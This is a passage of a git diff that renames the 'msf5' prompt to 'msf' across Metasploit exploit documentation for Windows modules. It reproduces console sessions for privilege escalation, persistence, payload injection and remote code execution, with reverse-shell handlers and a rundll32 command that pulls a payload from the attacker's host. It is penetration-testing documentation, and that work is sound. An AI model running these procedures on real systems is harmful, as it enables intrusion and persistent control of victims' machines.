vulnerable. Vulnerable version found: 1.2.66.64 -msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > run +msf exploit(windows/local/gog_galaxyclientservice_privesc) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Starting GalaxyClientService... diff --git a/documentation/modules/exploit/windows/local/mov_ss.md b/documentation/modules/exploit/windows/local/mov_ss.md index acceb5caea..c2421767a8 100644 --- a/documentation/modules/exploit/windows/local/mov_ss.md +++ b/documentation/modules/exploit/windows/local/mov_ss.md @@ -14,7 +14,7 @@ test it on a real machine if possible. ## Verification Steps ``` -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.135.111:4567 [*] Sending stage (206403 bytes) to 192.168.136.142 
@@ -31,8 +31,8 @@ Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/windows/local/mov_ss -msf5 exploit(windows/local/mov_ss) > show options +msf exploit(multi/handler) > use exploit/windows/local/mov_ss +msf exploit(windows/local/mov_ss) > show options Module options (exploit/windows/local/mov_ss): @@ -61,13 +61,13 @@ Exploit target: 0 Windows x64 -msf5 exploit(windows/local/mov_ss) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(windows/local/mov_ss) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/mov_ss) > set lhost 192.168.135.111 +msf exploit(windows/local/mov_ss) > set lhost 192.168.135.111 lhost => 192.168.135.111 -msf5 exploit(windows/local/mov_ss) > set lport 4567 +msf exploit(windows/local/mov_ss) > set lport 4567 lport => 4567 -msf5 exploit(windows/local/mov_ss) > run +msf exploit(windows/local/mov_ss) > run [*] Started reverse TCP handler on 192.168.135.111:4567 [*] Attempting to PrivEsc on DESKTOP-QGIC71I via session ID: 1 @@ -83,9 +83,9 @@ meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.136.142 - Meterpreter session 3 closed. Reason: User exit -msf5 exploit(windows/local/mov_ss) > set USE_INJECTION false +msf exploit(windows/local/mov_ss) > set USE_INJECTION false USE_INJECTION => false -msf5 exploit(windows/local/mov_ss) > run +msf exploit(windows/local/mov_ss) > run [*] Started reverse TCP handler on 192.168.135.111:4567 [*] Attempting to PrivEsc on DESKTOP-QGIC71I via session ID: 1 
@@ -94,7 +94,7 @@ msf5 exploit(windows/local/mov_ss) > run [*] Running exploit C:\Users\msfuser\AppData\Local\Temp\ACLgNJAJ.exe with payload C:\Users\msfuser\AppData\Local\Temp\kWDncKCjHtb.exe [*] Sending stage (206403 bytes) to 192.168.136.142 ^C[-] Exploit failed: Interrupt -msf5 exploit(windows/local/mov_ss) > sessions -l +msf exploit(windows/local/mov_ss) > sessions -l Active sessions =============== @@ -104,7 +104,7 @@ Active sessions 1 meterpreter x64/windows DESKTOP-QGIC71I\msfuser @ DESKTOP-QGIC71I 192.168.135.111:4567 -> 192.168.136.142:49696 (192.168.136.142) 4 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-QGIC71I 192.168.135.111:4567 -> 192.168.136.142:49699 (192.168.136.142) -msf5 exploit(windows/local/mov_ss) > exit +msf exploit(windows/local/mov_ss) > exit ``` ## Build Instructions diff --git a/documentation/modules/exploit/windows/local/ntusermndragover.md b/documentation/modules/exploit/windows/local/ntusermndragover.md index 91843af89c..d9fb16cc98 100644 --- a/documentation/modules/exploit/windows/local/ntusermndragover.md +++ b/documentation/modules/exploit/windows/local/ntusermndragover.md @@ -29,7 +29,7 @@ other versions of Windows, such as Windows Server 2008. ### Windows 7 SP0 x86 ``` -msf5 exploit(multi/handler) > sessions +msf exploit(multi/handler) > sessions Active sessions =============== 
@@ -38,16 +38,16 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15) -msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover -msf5 exploit(windows/local/ntusermndragover) > set session 1 +msf exploit(multi/handler) > use exploit/windows/local/ntusermndragover +msf exploit(windows/local/ntusermndragover) > set session 1 session => 1 -msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1 +msf exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555 +msf exploit(windows/local/ntusermndragover) > set LPORT 5555 LPORT => 5555 -msf5 exploit(windows/local/ntusermndragover) > run +msf exploit(windows/local/ntusermndragover) > run [*] Started reverse TCP handler on 192.168.56.1:5555 [*] Executing automatic check (disable AutoCheck to override) @@ -74,7 +74,7 @@ meterpreter > ``` -msf5 exploit(multi/handler) > sessions +msf exploit(multi/handler) > sessions Active sessions =============== 
@@ -83,16 +83,16 @@ Active sessions -- ---- ---- ----------- ---------- 1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5) -msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover -msf5 exploit(windows/local/ntusermndragover) > set session 1 +msf exploit(multi/handler) > use exploit/windows/local/ntusermndragover +msf exploit(windows/local/ntusermndragover) > set session 1 session => 1 -msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1 +msf exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555 +msf exploit(windows/local/ntusermndragover) > set LPORT 5555 LPORT => 5555 -msf5 exploit(windows/local/ntusermndragover) > run +msf exploit(windows/local/ntusermndragover) > run [*] Started reverse TCP handler on 192.168.56.1:5555 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/windows/local/payload_inject.md b/documentation/modules/exploit/windows/local/payload_inject.md index 0626ddea0d..64c68124f8 100644 --- a/documentation/modules/exploit/windows/local/payload_inject.md +++ b/documentation/modules/exploit/windows/local/payload_inject.md @@ -13,7 +13,7 @@ Windows Metro apps like Calc or Edge will crash if you try and use them as the ` ## Options ``` -msf5 exploit(windows/local/payload_inject) > show options +msf exploit(windows/local/payload_inject) > show options Module options (exploit/windows/local/payload_inject): 
@@ -42,7 +42,7 @@ Make sure that the `SESSION` value is set to the existing session identifier. ## Scenarios ### Windows 10x64 Build 17134 No PID ``` -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.135.168:5555 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used @@ -62,8 +62,8 @@ Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject -msf5 exploit(windows/local/payload_inject) > show options +msf exploit(multi/handler) > use exploit/windows/local/payload_inject +msf exploit(windows/local/payload_inject) > show options Module options (exploit/windows/local/payload_inject): @@ -83,13 +83,13 @@ Exploit target: 0 Windows -msf5 exploit(windows/local/payload_inject) > set session 1 +msf exploit(windows/local/payload_inject) > set session 1 session => 1 -msf5 exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/local/payload_inject) > set lhost 192.168.135.168 +msf exploit(windows/local/payload_inject) > set lhost 192.168.135.168 lhost => 192.168.135.168 -msf5 exploit(windows/local/payload_inject) > show options +msf exploit(windows/local/payload_inject) > show options Module options (exploit/windows/local/payload_inject): @@ -118,7 +118,7 @@ Exploit target: 0 Windows -msf5 exploit(windows/local/payload_inject) > run +msf exploit(windows/local/payload_inject) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] Running module against DESKTOP-D1E425Q 
@@ -160,9 +160,9 @@ meterpreter > ### Windows 10x64 Build 17134 No PID ``` -msf5 exploit(windows/local/payload_inject) > set PPID 3632 +msf exploit(windows/local/payload_inject) > set PPID 3632 PPID => 3632 -msf5 exploit(windows/local/payload_inject) > show options +msf exploit(windows/local/payload_inject) > show options Module options (exploit/windows/local/payload_inject): @@ -191,7 +191,7 @@ Exploit target: 0 Windows -msf5 exploit(windows/local/payload_inject) > run +msf exploit(windows/local/payload_inject) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] Running module against DESKTOP-D1E425Q diff --git a/documentation/modules/exploit/windows/local/persistence_image_exec_options.md b/documentation/modules/exploit/windows/local/persistence_image_exec_options.md index 794fc1d192..198b574387 100644 --- a/documentation/modules/exploit/windows/local/persistence_image_exec_options.md +++ b/documentation/modules/exploit/windows/local/persistence_image_exec_options.md @@ -25,12 +25,12 @@ meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > background [*] Backgrounding session 8... -msf5 exploit(multi/handler) > use exploit/windows/local/persistence_image_exec_options -msf5 exploit(windows/local/persistence_image_exec_options) > set image_file notepad.exe +msf exploit(multi/handler) > use exploit/windows/local/persistence_image_exec_options +msf exploit(windows/local/persistence_image_exec_options) > set image_file notepad.exe image_file => notepad.exe -msf5 exploit(windows/local/persistence_image_exec_options) > set session 8 +msf exploit(windows/local/persistence_image_exec_options) > set session 8 session => 8 -msf5 exploit(windows/local/persistence_image_exec_options) > run +msf exploit(windows/local/persistence_image_exec_options) > run [*] Attempting Persistence on DESKTOP-D1E425Q via session ID: 8 [*] Payload pathname = C:\Users\msfuser\AppData\Local\Temp\xEaiLUS.exe 
@@ -38,7 +38,7 @@ msf5 exploit(windows/local/persistence_image_exec_options) > run [*] Writing ReportingMode to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe [*] Writing MonitorProcess to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe [*] Payload (7168 bytes) uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\xEaiLUS.exe -msf5 exploit(windows/local/persistence_image_exec_options) > show options +msf exploit(windows/local/persistence_image_exec_options) > show options Module options (exploit/windows/local/persistence_image_exec_options): @@ -68,14 +68,14 @@ Exploit target: 0 Automatic -msf5 exploit(windows/local/persistence_image_exec_options) > +msf exploit(windows/local/persistence_image_exec_options) > ``` In another window, start a listener and then launch notepad.exe on the target. Close notepad.exe and you should get a callback: ``` -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.135.168:4545 [*] Sending stage (206403 bytes) to 192.168.132.125 diff --git a/documentation/modules/exploit/windows/local/persistence_service.md b/documentation/modules/exploit/windows/local/persistence_service.md index 1795e2fbd9..03132b662a 100644 --- a/documentation/modules/exploit/windows/local/persistence_service.md +++ b/documentation/modules/exploit/windows/local/persistence_service.md @@ -39,7 +39,7 @@ The name of service. Random string as default. ### Windows 7 SP1 x64 ``` -msf5 exploit(windows/local/persistence_service) > sessions -i 1 +msf exploit(windows/local/persistence_service) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid 
@@ -54,16 +54,16 @@ Logged On Users : 2 Meterpreter : x86/windows meterpreter > background [*] Backgrounding session 1... -msf5 exploit(windows/local/persistence_service) > use exploit/windows/local/persistence_service -msf5 exploit(windows/local/persistence_service) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/local/persistence_service) > use exploit/windows/local/persistence_service +msf exploit(windows/local/persistence_service) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/local/persistence_service) > set lport 2333 +msf exploit(windows/local/persistence_service) > set lport 2333 lport => 2333 -msf5 exploit(windows/local/persistence_service) > set lhost 192.168.56.1 +msf exploit(windows/local/persistence_service) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf5 exploit(windows/local/persistence_service) > set session 1 +msf exploit(windows/local/persistence_service) > set session 1 session => 1 -msf5 exploit(windows/local/persistence_service) > exploit +msf exploit(windows/local/persistence_service) > exploit [*] Started reverse TCP handler on 192.168.56.1:2333 [*] Running module against TEST-PC @@ -91,7 +91,7 @@ meterpreter > background **Clean it** ``` -msf5 exploit(windows/local/persistence_service) > sessions -i 1 +msf exploit(windows/local/persistence_service) > sessions -i 1 [*] Starting interaction with 1... meterpreter > resource /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc diff --git a/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md b/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md index a036093ae5..72ba06b84a 100644 --- a/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md +++ b/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md 
@@ -38,16 +38,16 @@ ### Windows 7 SP1 (x64) ``` - msf5 > use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc - msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set session 1 + msf > use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc + msf exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set session 1 session => 1 - msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set verbose true + msf exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set verbose true verbose => true - msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > check + msf exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > check [*] The service is running, but could not be validated. - msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set lhost 172.16.191.165 + msf exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > run + msf exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Writing payload to C:\Users\test\AppData\Local\Temp\MuVtxrl9.exe ... diff --git a/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md b/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md index 030e826d86..a77d0bbe3b 100644 --- a/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md +++ b/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md 
@@ -32,12 +32,12 @@ ### Tested on Ricoh PCL6 Universal Driver `v4.13` ``` - msf5 > use multi/handler - msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp + msf > use multi/handler + msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lhost 192.168.37.1 + msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (206403 bytes) to 192.168.37.199 @@ -55,7 +55,7 @@ Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... - msf5 exploit(multi/handler) > use ricoh_driver_privesc + msf exploit(multi/handler) > use ricoh_driver_privesc Matching Modules ================ @@ -66,15 +66,15 @@ [*] Using exploit/windows/local/ricoh_driver_privesc - msf5 exploit(windows/local/ricoh_driver_privesc) > set session 1 + msf exploit(windows/local/ricoh_driver_privesc) > set session 1 session => 1 - msf5 exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp + msf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp - msf5 exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1 + msf exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(windows/local/ricoh_driver_privesc) > check + msf exploit(windows/local/ricoh_driver_privesc) > check [*] The target appears to be vulnerable. Ricoh driver directory has full permissions - msf5 exploit(windows/local/ricoh_driver_privesc) > run + msf exploit(windows/local/ricoh_driver_privesc) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Adding printer JLFJCi... 
diff --git a/documentation/modules/exploit/windows/local/webexec.md b/documentation/modules/exploit/windows/local/webexec.md index cd22b52eac..ed3b16be2a 100644 --- a/documentation/modules/exploit/windows/local/webexec.md +++ b/documentation/modules/exploit/windows/local/webexec.md @@ -23,12 +23,12 @@ ``` - msf5 > use multi/handler - msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp + msf > use multi/handler + msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lhost 192.168.37.1 + msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (179779 bytes) to 192.168.37.136 @@ -38,14 +38,14 @@ Server username: WIN-MGMN7ND70I1\a_user meterpreter > background [*] Backgrounding session 1... - msf5 exploit(multi/handler) > use exploit/windows/local/webexec - msf5 exploit(windows/local/webexec) > set session 1 + msf exploit(multi/handler) > use exploit/windows/local/webexec + msf exploit(windows/local/webexec) > set session 1 session => 1 - msf5 exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp + msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(windows/local/webexec) > set lhost 192.168.37.1 + msf exploit(windows/local/webexec) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(windows/local/webexec) > run + msf exploit(windows/local/webexec) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Checking service exists... diff --git a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md index 32e6461efa..3bf7fa5774 100644 
--- a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md +++ b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md @@ -47,16 +47,16 @@ ### Windows 7 SP1 (x64) ``` - msf5 > use exploit/windows/local/windscribe_windscribeservice_priv_esc - msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1 + msf > use exploit/windows/local/windscribe_windscribeservice_priv_esc + msf exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1 session => 1 - msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true + msf exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true verbose => true - msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > check + msf exploit(windows/local/windscribe_windscribeservice_priv_esc) > check [*] The service is running, but could not be validated. - msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 172.16.191.165 + msf exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run + msf exploit(windows/local/windscribe_windscribeservice_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Writing payload (283 bytes) to C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe ... diff --git a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md index b253170759..fd60389679 100644 --- a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md +++ b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md 
@@ -40,12 +40,12 @@ ## Scenarios - msf5 > use exploit/windows/misc/ais_esel_server_rce - msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212 + msf > use exploit/windows/misc/ais_esel_server_rce + msf exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212 rhosts => 10.66.75.212 - msf5 exploit(windows/misc/ais_esel_server_rce) > check + msf exploit(windows/misc/ais_esel_server_rce) > check [+] 10.66.75.212:5099 - The target is vulnerable. - msf5 exploit(windows/misc/ais_esel_server_rce) > run + msf exploit(windows/misc/ais_esel_server_rce) > run [*] Started reverse TCP handler on 10.66.75.208:4444 [+] 10.66.75.212:5099 - Correct response received => Data send successfully diff --git a/documentation/modules/exploit/windows/misc/crosschex_device_bof.md b/documentation/modules/exploit/windows/misc/crosschex_device_bof.md index e115aadde4..a1e8ef6b7a 100644 --- a/documentation/modules/exploit/windows/misc/crosschex_device_bof.md +++ b/documentation/modules/exploit/windows/misc/crosschex_device_bof.md @@ -50,7 +50,7 @@ As above. ## Scenarios ``` -msf5 exploit(windows/misc/crosschex_device_bof) > run +msf exploit(windows/misc/crosschex_device_bof) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] CrossChex broadcast received, sending payload in response diff --git a/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md b/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md index 908efbb240..c242c41825 100644 --- a/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md +++ b/documentation/modules/exploit/windows/misc/tiny_identd_overflow.md @@ -29,8 +29,8 @@ ### TinyIdentD 2.2 on Windows XP SP0 - English (x86) ``` - msf5 > use exploit/windows/misc/tiny_identd_overflow - msf5 exploit(windows/misc/tiny_identd_overflow) > show targets + msf > use exploit/windows/misc/tiny_identd_overflow + msf exploit(windows/misc/tiny_identd_overflow) > show targets Exploit targets: 
@@ -46,11 +46,11 @@ 7 Windows XP SP2 - Italian - msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5 + msf exploit(windows/misc/tiny_identd_overflow) > set target 5 target => 5 - msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140 + msf exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140 rhosts => 172.16.191.140 - msf5 exploit(windows/misc/tiny_identd_overflow) > run + msf exploit(windows/misc/tiny_identd_overflow) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ... diff --git a/documentation/modules/exploit/windows/misc/veeam_one_agent_deserialization.md b/documentation/modules/exploit/windows/misc/veeam_one_agent_deserialization.md index 58f97ac411..c3361bf893 100644 --- a/documentation/modules/exploit/windows/misc/veeam_one_agent_deserialization.md +++ b/documentation/modules/exploit/windows/misc/veeam_one_agent_deserialization.md @@ -55,8 +55,8 @@ if your environment is different. ### Veeam ONE Agent 10.0.0.750 on Windows 10 x64 ``` -msf5 > use exploit/windows/misc/veeam_one_agent_deserialization -msf5 exploit(windows/misc/veeam_one_agent_deserialization) > options +msf > use exploit/windows/misc/veeam_one_agent_deserialization +msf exploit(windows/misc/veeam_one_agent_deserialization) > options Module options (exploit/windows/misc/veeam_one_agent_deserialization): 
@@ -88,11 +88,11 @@ Exploit target: 2 PowerShell Stager -msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set rhosts 172.16.249.150 +msf exploit(windows/misc/veeam_one_agent_deserialization) > set rhosts 172.16.249.150 rhosts => 172.16.249.150 -msf5 exploit(windows/misc/veeam_one_agent_deserialization) > set lhost 172.16.249.1 +msf exploit(windows/misc/veeam_one_agent_deserialization) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(windows/misc/veeam_one_agent_deserialization) > run +msf exploit(windows/misc/veeam_one_agent_deserialization) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] 172.16.249.150:2805 - Connecting to 172.16.249.150:2805 diff --git a/documentation/modules/exploit/windows/misc/webdav_delivery.md b/documentation/modules/exploit/windows/misc/webdav_delivery.md index a61275d56a..d089def406 100644 --- a/documentation/modules/exploit/windows/misc/webdav_delivery.md +++ b/documentation/modules/exploit/windows/misc/webdav_delivery.md @@ -19,11 +19,11 @@ and then getting a session back. # Demo ``` -msf5 exploit(windows/misc/webdav_delivery) > run +msf exploit(windows/misc/webdav_delivery) > run [*] Exploit running as background job 3. [*] Started reverse TCP handler on 172.16.249.1:4444 -msf5 exploit(windows/misc/webdav_delivery) > [*] Using URL: http://172.16.249.1:8080/ +msf exploit(windows/misc/webdav_delivery) > [*] Using URL: http://172.16.249.1:8080/ [*] Server started. [*] Run the following command on the target machine: rundll32.exe \\172.16.249.1@8080\ANYTHING,Init @@ -31,7 +31,7 @@ rundll32.exe \\172.16.249.1@8080\ANYTHING,Init [*] Sending stage (180291 bytes) to 172.16.249.130 [*] Meterpreter session 4 opened (172.16.249.1:4444 -> 172.16.249.130:49219) at 2018-12-12 13:25:06 -0600 -msf5 exploit(windows/misc/webdav_delivery) > sessions +msf exploit(windows/misc/webdav_delivery) > sessions Active sessions =============== 
@@ -40,5 +40,5 @@ Active sessions -- ---- ---- ----------- ---------- 4 meterpreter x86/windows 172.16.249.1:4444 -> 172.16.249.130:49219 (172.16.249.130) -msf5 exploit(windows/misc/webdav_delivery) > +msf exploit(windows/misc/webdav_delivery) > ``` diff --git a/documentation/modules/exploit/windows/nimsoft/nimcontroller_bof.md b/documentation/modules/exploit/windows/nimsoft/nimcontroller_bof.md index 4fed51fe31..5bd3c43c7a 100644 --- a/documentation/modules/exploit/windows/nimsoft/nimcontroller_bof.md +++ b/documentation/modules/exploit/windows/nimsoft/nimcontroller_bof.md @@ -27,7 +27,7 @@ exploit the service an unlimited amount of times. ### Windows 10 x64 ``` -msf5 exploit(windows/nimsoft/nimcontroller_bof) > options +msf exploit(windows/nimsoft/nimcontroller_bof) > options Module options (exploit/windows/nimsoft/nimcontroller_bof): @@ -55,7 +55,7 @@ Exploit target: 0 Windows Universal (x64) - v7.80.3132 -msf5 exploit(windows/nimsoft/nimcontroller_bof) > exploit +msf exploit(windows/nimsoft/nimcontroller_bof) > exploit [*] Started HTTPS reverse handler on https://A.B.C.D:8443 [*] W.X.Y.Z:48000 - Executing automatic check (disable AutoCheck to override) @@ -94,9 +94,9 @@ meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > background [*] Backgrounding session 1... -msf5 exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\ +msf exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\ DIRECTORY => C:\Users\ -msf5 exploit(windows/nimsoft/nimcontroller_bof) > check +msf exploit(windows/nimsoft/nimcontroller_bof) > check [*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun 1 2015] detected, sending directory_list probe diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index 12446fe3b5..dfd840eaa3 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md 
@@ -35,11 +35,11 @@ This module will either use a provided session number (which can be guessed with ### Testing on Windows 10 Pro x64 running NCS Server 2.4.0 ``` -msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200 +msf exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 exploit(windows/nuuo/nuuo_cms_fu) > set verbose true +msf exploit(windows/nuuo/nuuo_cms_fu) > set verbose true verbose => true -msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit +msf exploit(windows/nuuo/nuuo_cms_fu) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] 172.22.222.200:5180 - Backing up LicenseTool.dll to TQzixBdpOiRG diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_sqli.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_sqli.md index 984df4036d..283786d620 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_sqli.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_sqli.md @@ -54,11 +54,11 @@ The following versions were tested: ### Tested on Windows 10 Pro x64 running NCS Server 2.4.0 ``` -msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set rhosts 172.22.222.200 +msf exploit(windows/nuuo/nuuo_cms_sqli) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set srvhost 172.22.222.136 +msf exploit(windows/nuuo/nuuo_cms_sqli) > set srvhost 172.22.222.136 srvhost => 172.22.222.136 -msf5 exploit(windows/nuuo/nuuo_cms_sqli) > exploit +msf exploit(windows/nuuo/nuuo_cms_sqli) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] 172.22.222.200:5180 - Starting up our web service on http://172.22.222.136:8080/YxAxhLwOUeKzH ... diff --git a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md index ff3ac7c320..805b37bf14 100644 --- a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md 
